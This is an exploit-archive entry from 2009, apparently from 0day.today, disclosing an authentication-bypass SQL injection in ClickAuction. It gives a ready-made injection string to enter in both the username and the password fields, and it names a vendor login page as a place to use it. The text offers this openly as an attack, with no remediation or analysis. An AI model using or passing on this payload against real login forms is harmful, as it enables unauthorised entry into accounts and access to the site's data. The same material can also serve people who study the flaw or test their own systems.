id: 4736
date: 01/26/2009
title: ClickAuction (Auth Bypass) Remote SQL Injection Vulnerability
author: R3d-D3v!L
cves: 

=============================================================
ClickAuction (Auth Bypass) Remote SQL Injection Vulnerability
=============================================================



  Tybe:(Auth Bypass) Remote SQL Injection Vulnerability

  Vendor: ClickAuction

  Software: ClickAuction

  Author: ((R3d D3v!L))

  Date: 26.1.2009


  Exploit:


  username: r0' or ' 1=1--

  password: r0' or ' 1=1--


  login 4 d3m0:

  www.clicktech.com/clickauction/login.asp



#  0day.today [2023-03-22]  #